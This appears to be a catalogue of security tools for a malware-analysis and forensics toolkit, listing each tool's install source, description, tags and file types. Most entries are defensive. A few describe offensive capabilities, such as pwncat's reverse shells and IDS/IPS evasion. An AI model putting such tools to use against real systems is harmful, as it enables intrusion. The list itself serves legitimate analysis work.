PE-sieve GitHub Release Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches). pe-analysis, malware-analysis, dynamic-analysis .exe, .dll
PE-utils GitHub Release A set of small utilities, helpers for PIN tracers. pe-analysis, reverse-engineering .exe, .dll, .sys
peepdf-3 Python A Python 3 tool to explore, analyse, and disassemble PDF files pdf, malware-analysis, javascript .pdf
pefile Python pe-analysis, reverse-engineering .exe, .dll, .sys
pestudio HTTP pestudio is a tool for analyzing PE files. pe-analysis, malware-analysis, static-analysis .exe, .dll, .sys
peutils Python pe-analysis, packer-detection .exe, .dll
pfp Python binary-analysis, file-analysis .bin
PHP HTTP PHP is a scripting language widely used for web development. scripting, web .php
PowerDecode Git PowerDecode is a PowerShell-based tool that allows to deobfuscate PowerShell scripts obfuscated across multiple layers. The tool performs code dynamic analysis, extracting malware hosting URLs and checking http response.It can also detect if the malware attempts to inject shellcode into memory. powershell, deobfuscation, malware-analysis
PowerShell GitHub Release PowerShell is a task automation and configuration management framework from Microsoft. scripting, shell, automation .ps1, .psm1, .psd1
PowerShell 7 Winget PowerShell 7 is a cross-platform shell and scripting language that provides a powerful command-line interface and automation capabilities. scripting, shell, automation .ps1, .psm1, .psd1
PowerSponse Git PowerSponse is a PowerShell module focused on targeted containment and remediation during incident response. incident-response, powershell
ppdeep Python hashing, fuzzy-hashing, binary-diffing
Prefetch Browser GitHub Release Prefetch Browser is a tool for analyzing Windows Prefetch files, which can provide valuable information about program execution and system activity. windows, forensics, filesystem .pf
prettytable Python data-processing
ProcDOT HTTP ProcDOT is a visual malware analysis tool for process, file, and network activity. malware-analysis, visualization, dynamic-analysis .csv, .log Full only
protodeep Python A tool to help reversing protobuf. parsing, reverse-engineering .bin
psexposed Git Community-driven PowerShell detection indicators windows, forensics .ps1
PST Walker HTTP PST Walker is a tool for analyzing PST files. email, forensics .pst
ptpython Python Python REPL build on top of prompt_toolkit. python, scripting .py
PuTTY Winget PuTTY is a free and open-source terminal emulator and SSH client for Windows. It is used to connect to remote systems via SSH, Telnet, and other protocols. network, terminal Full only
pwncat Python Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell and port forwarding magic - and its fully scriptable with Python (PSE). exploitation, security-testing
pyasn1 Python
pycares Python network, dns
pycryptodome Python encryption, cryptography
pydivert Python network, pcap .pcap
pyghidra Python The PyGhidra Python library, originally developed by the Department of Defense Cyber Crime Center (DC3) under the name "Pyhidra", is a Python library that provides direct access to the Ghidra API within a native CPython 3 interpreter using JPype. PyGhidra contains some conveniences for setting up analysis on a given sample and running a Ghidra script locally. It also contains a Ghidra plugin to allow the use of CPython 3 from the Ghidra GUI. reverse-engineering, decompiler, scripting .exe, .dll, .elf
pyOneNote Python office, data-extraction .one
pypdf Python pdf, data-extraction .pdf
pypng Python steganography .png
PyrsistenceSniper Python Point it at a KAPE dump, a Velociraptor collection, or a mounted disk image and get offline Windows persistence detection in seconds. No live system access, no admin privileges, no PowerShell. Runs on Windows, Linux, and macOS because investigators don't always get to pick their workstation. malware-analysis, forensics, ioc, data-extraction, enrichment
pyshark Python network-analysis, pcap, protocol-analysis .pcap, .pcapng
pysigma-backend-elasticsearch Python sigma, detection, log-analysis, search .yml, .yaml
pySigma-backend-loki Python sigma, detection .yml, .yaml
pysigma-backend-splunk Python sigma, detection, siem .yml, .yaml
pysigma-backend-sqlite Python sigma, detection, sqlite .yml, .yaml
pysigma-pipeline-sysmon Python sigma, detection, event-log, windows .yml, .yaml
pysigma-pipeline-windows Python sigma, detection, windows .yml, .yaml
PySocks Python network
Python 3.11 Installer Python is a programming language that lets you work quickly and integrate systems more effectively. python .py
python-docx Python office, data-extraction .docx
python-dotenv Python
Python-dsstore Git A library for parsing .DS_Store files and extracting file names forensics, macos, data-extraction .DS_Store
python-magic Python
python-registry Python registry, windows, forensics .reg, .dat
pyvis Python visualization, graph
pyzipper Python compression, encryption .zip
QEMU Winget QEMU is a generic and open-source machine emulator and virtualizer. It can be used to run operating systems and applications for different architectures on a host system, making it useful for testing, development, and analysis. emulation .qcow2, .vmdk, .vdi, .img, .iso Full only
qpdf GitHub Release qpdf: A content-preserving PDF document transformer pdf, data-processing .pdf
qrtool GitHub Release Tool for decoding QR codes from images encoding, decoding .png, .svg
quickadd GitHub Release Obsidian quickadd plugin. markdown, automation, plugins Full only
r2ai Git Native AI plugin for radare2. Compiled from source in the MSYS2 sandbox using gcc and pkg-config. Provides AI-assisted analysis using local and remote language models. reverse-engineering, ai .exe, .dll, .elf, .bin, .so
r2ai GitHub Release LLM-based reversing for radare2. reverse-engineering, mcp, ai .exe, .dll, .elf, .bin, .so
Radare2 GitHub Release UNIX-like reverse engineering framework and command-line toolset reverse-engineering, disassembler, debugging .exe, .dll, .elf, .bin, .so, .mach-o
radare2-deep-graph Git A Cutter plugin to generate radare2 graphs. reverse-engineering, visualization, plugins
radare2-mcp GitHub Release MCP stdio server for radare2. Enables AI assistants to interact with radare2 for binary analysis. Known issue: Windows binary may crash with stack overflow (GitHub issue #24). reverse-engineering, mcp, ai .exe, .dll, .elf, .bin, .so
RdpCacheStitcher Git RdpCacheStitcher is a tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps. forensics, network, windows, disk-forensics
RDPCacheStitcher GitHub Release RdpCacheStitcher is a tool for analyzing RDP cache files. network, forensics, windows .bmc, .bin
readpe GitHub Release The PE file analysis toolkit pe-analysis, reverse-engineering .exe, .dll, .sys
Recaf GitHub Release Recaf is a modern Java bytecode editor. reverse-engineering, java, decompiler, deobfuscation .class, .jar Full only
recbin HTTP recbin parses Windows Recycle Bin files. binary-analysis, carving .bin
redress GitHub Release Redress - A tool for analyzing stripped Go binaries. reverse-engineering, golang .exe, .elf
regipy Python Regipy is a python library for parsing offline registry hives. registry, windows, forensics .reg, .dat
regipy-mcp-server Git regipy repository including regipy MCP server for AI-assisted registry analysis. registry, windows, forensics, mcp .reg, .dat
RegShot Git RegShot is a small, free and open-source registry compare utility.
requests Python network, http
Resource Hacker HTTP Resource Hacker is a tool for viewing and editing resources in Windows executables. pe-analysis, reverse-engineering .exe, .dll, .res
rexi Python search, data-processing, tui
ripgrep GitHub Release ripgrep is a fast, modern, and user-friendly command-line search tool. search, cli
RpcView GitHub Release RpcView is a tool to view RPC endpoints. network, windows
Ruby Winget Ruby is a dynamic, open-source programming language with a focus on simplicity and productivity. It has an elegant syntax that is natural to read and easy to write. scripting .rb Full only
Rust Installer Rust programming language.
rzpipe Python reverse-engineering, scripting .exe, .dll, .elf, .bin
scapy Python network-analysis, pcap, security-testing .pcap, .pcapng
scare Git A multi-arch assembly REPL and emulator for your command line. reverse-engineering, emulation, scripting
Shadow-Pulse Git Information about ransomware groups (Ransomware Analysis Notes) threat-intelligence, ioc
shodan Python osint, network
sidr GitHub Release Search Index Database Reporter browser-forensics, forensics .db, .sqlite
sigma Git Main Sigma Rule Repository sigma, detection-rules, siem
sigma-cli Python sigma, detection, log-analysis .yml, .yaml
signature-base Git YARA signature and IOC database for my scanners and tools. yara, detection-rules, ioc .yara
simplejson Python json, data-processing .json
Sleuthkit GitHub Release The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence. disk-forensics, filesystem, forensics .dd, .raw, .E01, .img, .vmdk
SmartDeblur Git SmartDeblur is a tool for restoring defocused and blurred images. It can be used to recover details from images that are out of focus or have motion blur. image-restoration, forensics
Snort Rules Enrichment Snort 3 community ruleset for network intrusion detection. ids, detection-rules, network .rules, .tar.gz
speakeasy Python Windows malware emulation framework that executes binaries, drivers, and shellcode in a modeled Windows runtime without a full VM. Produces structured JSON reports. malware-analysis, emulation, shellcode, reverse-engineering, windows .exe, .dll, .sys, .bin
sqlit-tui Python database, sqlite, tui .db, .sqlite, .sqlite3
SQLite Tools HTTP SQLite command-line tools. database, sqlite, cli .db, .sqlite, .sqlite3
srum_dump GitHub Release A forensics tool to convert the data in the Windows srum (System Resource Usage Monitor) database to an xlsx spreadsheet. windows, forensics, filesystem .dat
SSC-Threat-Intel-IoCs Enrichment SecurityScorecard threat intelligence indicators of compromise. threat-intelligence, ioc
SSHniff Cargo SSHniff is a command-line tool for capturing and analyzing SSH network traffic. It can be used to monitor and inspect SSH sessions, helping in forensic analysis of network communications. network-analysis, ssh, pcap .pcap, .pcapng
stego-lsb Python steganography, audio .png, .bmp, .wav
Strawberry Perl GitHub Release Strawberry Perl is a Perl distribution for Windows that includes a complete Perl environment. scripting .pl, .pm Full only
Suricata Rules Enrichment Emerging Threats open ruleset for Suricata IDS. ids, detection-rules, network .rules, .zip
Sysinternals Suite HTTP Sysinternals Suite is a collection of utilities for Windows. windows, debugging, monitoring .exe, .dll, .sys
Tailscale Winget Tailscale is a modern VPN solution that allows you to create secure, private networks between your devices. It is designed to be easy to use and can be used for remote access, secure file sharing, and connecting devices across different networks. network Full only
takajo GitHub Release Takajō (鷹匠) is a Hayabusa results analyzer. log-analysis, timeline .json
Templater GitHub Release Obsidian templater plugin. markdown, automation, plugins Full only
termcolor Python terminal
textsearch Python data-processing, search
threat-intel Git Signatures and IoCs from public Volexity blog posts. threat-intelligence, ioc
Thumbcacheviewer GitHub Release Thumbcache Viewer - Extract Windows Vista, Windows 7, Windows 8, Windows 8.1, and Windows 10 thumbcache database files. windows, forensics, metadata .db
time-decode Python metadata, forensics, decoding
tomlkit Python parsing, data-processing .toml
ToolAnalysisResultSheet Git This repository summarizes the results of examining logs recorded in Windows upon execution of the 49 tools which are likely to be used by the attacker that has infiltrated a network. forensics, documentation, security-testing .evtx
toolong Python log-analysis, tui .log, .txt
Tor Browser HTTP Tor Browser is a privacy-focused web browser based on Firefox. browser, network .html, .htm Full only
TOR Exit Nodes Enrichment TOR exit node lists from the Tor Project collector archive. blocklist, network, threat-intelligence
TotalRecall Git This tool extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots. windows, forensics
Trawler Git PowerShell script helping Incident Responders discover potential adversary persistence mechanisms. windows, malware-analysis, threat-hunting
treelib Python data-processing, filesystem
TrID HTTP TrID is a file identifier utility. file-analysis
ULogViewer GitHub Release ULogViewer is a log viewer for ULog files. log-analysis, viewer .exe, .dll
unicorn Python reverse-engineering, emulation
unpy2exe Python reverse-engineering, python, decompiler .exe
upx GitHub Release UPX is a free, portable, extendable, high-performance executable packer. packer-detection, pe-analysis, compression .exe, .dll, .elf
usnjrnl Cargo The usnjrnl tool is a command-line utility for parsing Windows UsnJrnl files. It allows you to extract and analyze information from the USN Journal, which is a feature of the NTFS file system that tracks changes to files and directories. This tool can be useful for forensic investigations and understanding file system activity. filesystem, forensics, ntfs, windows .bin
uv Installer uv is a fast Python package installer and manager. It can be used to create and manage virtual environments, install packages, and run Python scripts. It is designed to be a faster and more efficient alternative to pip and virtualenv. python .py
Velociraptor GitHub Release Velociraptor is an advanced digital forensic and incident response tool that enhances your visibility into your endpoints. incident-response, forensics, endpoint-detection .json, .csv Full only
Velociraptor Artifact Exchange HTTP The artifact exchange is a place for sharing community contributed artifacts for Velociraptor. Simply search below for an artifact that might address your need. If you wish to contribute to the exchange, please click the button to the right. forensics, incident-response
VeraCrypt HTTP VeraCrypt is a disk encryption tool. encryption, disk-forensics .hc, .tc Full only
VirusTotal CLI Winget VirusTotal CLI is a command-line tool for interacting with VirusTotal, allowing you to analyze files and URLs for malware and other threats. malware-analysis, threat-intelligence, ioc-scanner Full only
visidata Python data-processing, tui, csv .csv, .tsv, .json, .sqlite, .xlsx
Visual Studio Code HTTP Visual Studio Code is a source-code editor. text-editor, code-editor, powershell .ps1, .py, .js, .ts, .json, .xml, .yaml, .md
VLC Winget VLC is a versatile media player that supports a wide range of audio and video formats. It can be used for playing media files, streaming content, and even basic media conversion tasks. audio .mp4, .avi, .mkv, .mov, .mp3, .wav, .flac Full only
Volatility Workbench 2.1 HTTP Volatility Workbench is a GUI for the Volatility memory analysis framework. memory-forensics, gui .dmp, .raw, .vmem, .img Full only
Volatility Workbench 3 HTTP Volatility Workbench is a GUI for the Volatility memory analysis framework. memory-forensics, gui .dmp, .raw, .vmem, .img Full only
Volexity Threat Intel Enrichment Volexity threat intelligence indicators and YARA rules. threat-intelligence, ioc
VS Code PowerShell Extension GitHub Release Visual Studio Code PowerShell extension. text-editor, powershell, plugins .ps1, .psm1, .psd1
VS Code Spell Checker GitHub Release Visual Studio Code Spell Checker extension. text-editor, plugins
vscode-shellcheck GitHub Release Shellcheck extension for VS Code. text-editor, scripting, plugins Full only
White-Phoenix Git A tool to recover content from files encrypted with intermittent encryption ransomware, decryption, data-recovery Full only
white-phoenix Python White-Phoenix is a tool that recovers content from files encrypted by Ransomware using intermittent encryption. It is designed to help incident responders and forensic analysts to retrieve data from encrypted files when the decryption key is not available. ransomware, encryption, decryption, forensics, data-recovery .encrypted, .locked, .enc
Win API Search HTTP Win API Search is a tool for searching Windows API functions. reverse-engineering, windows
WinDbg Winget WinDbg is a powerful debugger from Microsoft that can be used for analyzing crash dumps, debugging applications, and performing memory forensics. It is commonly used in incident response and malware analysis to investigate system crashes and analyze the behavior of malicious software. debugging, memory-forensics, windows .dmp, .exe, .dll, .sys
Windows Terminal (Canary) HTTP Windows Terminal Canary package. terminal, shell
WinMerge Winget WinMerge is a visual file and directory comparison tool that helps you compare files and directories. It is useful for identifying differences between files, merging changes, and synchronizing directories. binary-diffing
WinObjEx64 GitHub Release WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. windows, debugging
winpmem HTTP winpmem is a Windows memory acquisition driver. memory-forensics, acquisition .raw, .aff4
WireGuard Winget WireGuard is a modern and efficient VPN protocol that provides secure and fast connections. It is designed to be simple to configure and use, making it a popular choice for both personal and enterprise VPN solutions. network Full only
Wireshark Winget Wireshark is a widely used network protocol analyzer that allows you to capture and analyze network traffic. It can be used for troubleshooting network issues, analyzing security incidents, and learning about network protocols. Wireshark provides a graphical interface for viewing and filtering captured packets, making it easier to analyze complex network traffic. network-analysis, pcap, protocol-analysis .pcap, .pcapng, .cap
Wireshark Manuf Enrichment Wireshark OUI/MAC address manufacturer lookup file. network, network-analysis .txt
Witr GitHub Release Why is this running? forensics, triage
X4BNet Bots List Enrichment X4BNet list of known bot IP addresses. threat-intelligence, network, blocklist
X4BNet Cloudflare List Enrichment X4BNet list of known Cloudflare IP addresses. network, blocklist
X4BNet Route53 List Enrichment X4BNet list of known AWS Route53 health check IP addresses. dns, network, blocklist
X4BNet Search Engine List Enrichment X4BNet list of known search engine crawler IP addresses. search, network, blocklist
X4BNet StopForumSpam Enrichment X4BNet list of known spam IP addresses from StopForumSpam. email, network, blocklist
X4BNet TOR Exit List Enrichment X4BNet list of known TOR exit node IP addresses. network, blocklist
X4BNet UptimeRobot List Enrichment X4BNet list of known UptimeRobot monitoring IP addresses. monitoring, network, blocklist
X4BNet VPN List Enrichment X4BNet list of known VPN IP addresses. network, blocklist
x64dbg GitHub Release An open-source user mode debugger for Windows. Optimized for reverse engineering and malware analysis. reverse-engineering, debugging, dynamic-analysis .exe, .dll
XELFViewer GitHub Release ELF file viewer/editor for Windows, Linux and MacOS. reverse-engineering, elf-analysis .elf, .mach-o
XLMMacroDeobfuscator Python office, vba, deobfuscation, malware-analysis .xls, .xlsm, .xlsb
xlrd Python office, data-extraction .xls
XlsxWriter Python office .xlsx
xxhash Python hashing
YAMAGoya GitHub Release Yet Another Memory Analyzer for malware detection and Guarding Operations with YARA and SIGMA yara, detection-rules .yar, .yara Full only
YARA GitHub Release YARA is a tool for identifying and classifying malware. yara, malware-analysis, detection, detection-rules .yar, .yara, .exe, .dll, .bin
YARA Forge Rules Core Enrichment YARA Forge core ruleset - curated set of high-quality YARA rules. yara, detection-rules, malware-detection .yar, .zip
YARA Forge Rules Extended Enrichment YARA Forge extended ruleset - broader set of YARA rules beyond the core set. yara, detection-rules, malware-detection .yar, .zip
YARA Forge Rules Full Enrichment YARA Forge full ruleset - comprehensive collection of all available YARA rules. yara, detection-rules, malware-detection .yar, .zip
yara-python Python yara, malware-analysis, detection .yar, .yara
yara-x GitHub Release yara-x is a faster and more flexible version of YARA. yara, malware-analysis, detection, detection-rules .yar, .yara, .exe, .dll, .bin
yq GitHub Release yq is a portable command-line YAML, JSON, XML, CSV, TOML and properties processor. yaml, data-processing, cli .yaml, .yml, .json, .xml, .toml
zaproxy GitHub Release The Zed Attack Proxy (ZAP) by Checkmarx is the world’s most widely used web app scanner. Free and open source. A community based GitHub Top 1000 project that anyone can contribute to. web, security-testing, network Full only
zensical Python Project documentation with Markdown. documentation, markdown .md, .toml
Zircolite GitHub Release Zircolite is a standalone SIGMA-based detection tool for EVTX, Auditd, Sysmon for linux, XML or JSONL,NDJSON Logs log-analysis, sigma, detection, incident-response .evtx, .json
zstd GitHub Release Zstandard is a fast lossless compression algorithm. compression, decompression, cli .zst
Zui GitHub Release Zui is a tool for analyzing network traffic. It can read pcap and zng files and provides a powerful query language for analyzing the data. network-analysis, pcap .pcap, .pcapng, .zng Full only